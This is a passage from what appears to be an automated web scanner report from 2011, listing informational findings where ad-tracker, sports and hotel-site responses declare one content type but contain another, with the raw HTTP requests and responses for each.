GET /fs/ruleaction.php?accountid=200106297609&urid=79044&cookieurid=&estara_fsguid=5860EEFA281121EC93852AEC182A3278&dnc=1317600784907704486 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsserver__SESSION__=t-501.estara.com; fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEGFjLke6WJJNAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh98VLi0sK2lwYkF9cKjWXdEJSUbAVeUEmfbt9bc9z23--XB-7XiPa.b5v54oJuYNDTOS.bh.3a4Upc7bIKnpkFS4SWEdkFT0SOHgSjEhAsfc4xMhhn8PeTTwRI6yQqJNDDJI9yUb6oGKAvA.gPCGWjs5j3KkNQOUkiGRTzBGXFJFaIV3UC3CJhL2QLgYRT8QT9UQ9IU9okAwqRqropLRo5FRhpLRikF00kkCCuR2ik-JJj0qrGAQ9QSMkOY2CmnIMxndUDsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmG6IkxXhKmw4AsTjODqqGrkMYjL25VnOrHu.Q8_

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:14 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Pragma: no-cache
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__; expires=Sat, 01-Oct-2016 00:13:14 GMT; path=/; domain=.estara.com
Content-Length: 8
Content-Type: text/html; charset=UTF-8

if(0){}

28.14. http://ats.tumri.net/ats/ats

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ats.tumri.net
Path:   /ats/ats

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /ats/ats?cmd=RT&AdvertiserID=3052&platform=T&ActionID=17&ActionName=RTALL&ut1=HOTEL;&ut2=&ut3=BOS&ut4=&ut5=US&cachebuster=1230846595 HTTP/1.1
Host: ats.tumri.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://fls.doubleclick.net/activityi;src=1653087;type=hotel756;cat=hotel329;u2=BOS;u3=unknown;u4=unknown;u5=0;u6=0;u7=55.26;u13=1;u15=US;u16=34A63N3;ord=1;num=418599216785?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-1000424298|547040017; t_opt=OPT-OUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_opt=OPT-OUT; Domain=.tumri.net; Expires=Sat, 21-Oct-2079 03:23:16 GMT; Path=/
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon Oct 03 00:09:09 UTC 2011
Content-Type: image/jpeg
Date: Mon, 03 Oct 2011 00:09:08 GMT
Content-Length: 807

GIF89a....................................................................................................................................3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f....
...[SNIP]...

28.15. http://aud.pubmatic.com/AdServer/Artemis

Summary

Severity:   Information
Confidence:   Firm
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AdServer/Artemis?dpid=7&group=tech_business_professional&industry=software&location=texas HTTP/1.1
Host: aud.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2; PUBMDCID=1; pubfreq_26072_21044_238858273=823-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:00 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success

28.16. http://calls.esitemarketing.com/euinc/getnumdata.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://calls.esitemarketing.com
Path:   /euinc/getnumdata.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /euinc/getnumdata.js?var=_vsrkpd.d;acc=CA6phExXGD1qdQFt;cky=rkpd_CA6phExXGD1qdQFt;ref=http%3A%2F%2Fwww.sabre.com%2F;url=http%3A%2F%2Fwww.sabrehospitality.com%2F%3Fesiteurl%3Dsabrehospitalitysolutions.com; HTTP/1.1
Host: calls.esitemarketing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:46 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29 mod_ssl/2.8.27 OpenSSL/0.9.7g
P3P: CP="NOI COR NID TAI OUR BUS STA"
Content-Type: text/html; charset=UTF-8
Content-Length: 191


_vsrkpd.d = null;
if( _vsrkpd.d ) {
_vsrkpd.set_cookie('rkpd_CA6phExXGD1qdQFt', '', 3600*24);
_vsrkpd.rewrite_document();
}else{
_vsrkpd.getnum_error( 'rewrite not found' );
}



28.17. http://calls.esitemarketing.com/euinc/number-changer.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://calls.esitemarketing.com
Path:   /euinc/number-changer.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /euinc/number-changer.js HTTP/1.1
Host: calls.esitemarketing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabrehospitality.com/?esiteurl=sabrehospitalitysolutions.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:44 GMT
Server: Apache/1.3.36 (Unix) mod_perl/1.29 mod_ssl/2.8.27 OpenSSL/0.9.7g
Content-Type: text/html; charset=UTF-8
Content-Length: 8514


// PATENT PENDING

function _vs_popup(url, wid, ht){
var win;
ht = ht || 600;
wid = wid || 650;

win = window.open(url, 'VSPOPUP', "toolbar=no,status=no,location=no,menubar=no,"+

...[SNIP]...

28.18. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /0802A570-D4D3-11E0-8F5A-3A5C91016B62

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /0802A570-D4D3-11E0-8F5A-3A5C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13483

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackBlue-0802A570-D4D3-11E0-8F5A-3A5C91016B62 { width: 300px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...

28.19. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /D712CB66-D4D2-11E0-ACD9-355C91016B62

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /D712CB66-D4D2-11E0-ACD9-355C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:10 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 1152

document.write('<style type="text/css">.p360_adunit { border: 1px solid #ffffff; width: 466px; height: 58px; background-color: #FFFFFF;}.p360_listing { font-size: 11px; font-family: arial, helv; heigh
...[SNIP]...

28.20. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /F09A1BDE-D4D2-11E0-99F0-875B91016B62

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /F09A1BDE-D4D2-11E0-99F0-875B91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:03 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 12893

document.write('<style type="text/css"> div#p360-hybrid120x600aquanotch-F09A1BDE-D4D2-11E0-99F0-875B91016B62 { width: 120px; left: 0; font-family: sans-serif; position: relative; display
...[SNIP]...

28.21. http://event.adxpose.com/event.flow

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-0666653885873574%26output%3Dhtml%26h%3D250%26slotname%3D7372794801%26w%3D300%26ea%3D0%26flash%3D10.3.183%26url%3Dhttp%253A%252F%252Fads.pubmatic.com%252Fhosteddefaulttags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26dt%3D1317606797018%26bpp%3D7%26shv%3Dr20110921%26jsv%3Dr20110914%26correlator%3D1317606797027%26frm%3D8%26adk%3D4114293891%26ga_vid%3D1069027809.1317606797%26ga_sid%3D1317606797%26ga_hid%3D1887245699%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D8%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D23%26u_nmime%3D106%26dff%3Dtimes%2520new%2520roman%26dfs%3D16%26adx%3D0%26ady%3D0%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D2019610879%26loc%3Dhttp%253A%252F%252Fads.pubmatic.com%252FHostedDefaultTags%252F26620%252F26621%252F21556%252F559%252Fadtag.html%26prodhost%3Dgoogleads.g.doubleclick.net%26fu%3D0%26ifi%3D1%26dtd%3D12&uid=eaa3bCBGoZRHY9Na_666924&xy=0%2C0&wh=300%2C250&vchannel=117962&iad=1317606801324-71110734669491650&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4248078B31C79B97218C3D4E49B5174D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 03 Oct 2011 01:53:15 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("eaa3bCBGoZRHY9Na_666924");

28.22. http://expedia-www.baynote.net/baynote/tags3/common

Summary

Severity:   Information
Confidence:   Firm
Host:   http://expedia-www.baynote.net
Path:   /baynote/tags3/common

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=ISO-8859-1

The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /baynote/tags3/common?customerId=expedia&code=www&timeout=undefined&onFailure=undefined HTTP/1.1
Host: expedia-www.baynote.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: public,max-age=27800,must-revalidate
Content-Type: text/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:14:16 GMT
Content-Length: 80021


                           baynote_globals.TagsURLPrefix="/baynote/tags3/";baynote_globals.CustomScript="customScript";baynote_globals.GuideSet="GuideSet";baynote_globals.ScriptWebapp="r";baynote_globals.Sc
...[SNIP]...

28.23. http://hublotnation.com/wp/wp-admin/admin-ajax.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hublotnation.com
Path:   /wp/wp-admin/admin-ajax.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /wp/wp-admin/admin-ajax.php HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
Content-Length: 27
Origin: http://hublotnation.com
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-www-form-urlencoded
accept: */*
Referer: http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; base_domain_50c378d8154db3a16aee8f1a8bb76f49=hublotnation.com; fbsetting_50c378d8154db3a16aee8f1a8bb76f49=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.4.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

action=stc_comm_get_display

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:05:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:05:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 1
Content-Type: text/html; charset=UTF-8

0

28.24. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hublotnation.com
Path:   /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
x-requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
accept: */*
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 455
Content-Type: text/html

<!-- socials postings -->
<dl id="socials-postings">
   <dt><label for="post-to-facebook">Post to my facebook</label><input type="checkbox" id="post-to-facebook" /></dt>
   <dt><label for="post-to-twitter
...[SNIP]...

28.25. http://i1.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i1.goal.com
Path:   /files/images/stats/goal/team-logos/7/97_20x20.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/7/97_20x20.jpg HTTP/1.1
Host: i1.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:25 GMT
Expires: Wed, 05 Oct 2011 00:50:25 GMT
Last-Modified: Fri, 30 Sep 2011 23:04:22 GMT
Server: ECS (sjo/522D)
X-Cache: HIT
Content-Length: 1111

GIF87a........"...T.^.....V...t.B..v.....:$.....l.......n.....N.....r.....Z...$.......~D....>.....J.........$....N..b...t....z.....^..~T..L.^..B.....f.....2.....~T.......R..R...\.6..V,.:..:...........
...[SNIP]...

28.26. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.goal.com
Path:   /files/images/stats/goal/team-logos/7/97_20x20.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/7/97_20x20.jpg HTTP/1.1
Host: i2.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:24 GMT
Expires: Wed, 05 Oct 2011 00:50:24 GMT
Last-Modified: Fri, 30 Sep 2011 23:04:22 GMT
Server: ECS (sjo/522D)
X-Cache: HIT
Content-Length: 1111

GIF87a........"...T.^.....V...t.B..v.....:$.....l.......n.....N.....r.....Z...$.......~D....>.....J.........$....N..b...t....z.....^..~T..L.^..B.....f.....2.....~T.......R..R...\.6..V,.:..:...........
...[SNIP]...

28.27. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_48x48.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.goal.com
Path:   /files/images/stats/goal/team-logos/7/97_48x48.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/7/97_48x48.jpg HTTP/1.1
Host: i2.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:24 GMT
Expires: Wed, 05 Oct 2011 00:50:24 GMT
Last-Modified: Fri, 30 Sep 2011 23:04:22 GMT
Server: ECS (sjo/5239)
X-Cache: HIT
Content-Length: 2259

GIF87a0.0....dJ....dR.....P......t.p.tn...y.p.....9.tnL....N.........D....p...g....`..p..~.................R............4.".........L..h.`.....J........^.....n...."..N.d^\.y.....p...$.h..............
...[SNIP]...

28.28. http://i2.goal.com/files/images/stats/goal/team-logos/8/98_20x20.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i2.goal.com
Path:   /files/images/stats/goal/team-logos/8/98_20x20.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /files/images/stats/goal/team-logos/8/98_20x20.jpg HTTP/1.1
Host: i2.goal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=176400
Content-Type: image/jpeg
Date: Sun, 02 Oct 2011 23:50:24 GMT
Expires: Wed, 05 Oct 2011 00:50:24 GMT
Last-Modified: Fri, 30 Sep 2011 23:00:26 GMT
Server: ECS (sjo/522C)
X-Cache: HIT
Content-Length: 1065

GIF87a.......,ZTL......:<....bdD...nL...l...........|...j4<....4......t..$.|.zt.......nt............\...JLtzt....~|....JLL...NL...d..l...z|.v|......\........D.........v|...L......fd......L.....4.|....
...[SNIP]...

28.29. http://img.agoda.net/images/default/bg_tthome.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://img.agoda.net
Path:   /images/default/bg_tthome.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/default/bg_tthome.gif HTTP/1.1
Host: img.agoda.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: image/gif
Last-Modified: Mon, 08 Nov 2010 10:06:21 GMT
Accept-Ranges: bytes
ETag: "8ad1ec972c7fcb1:0"
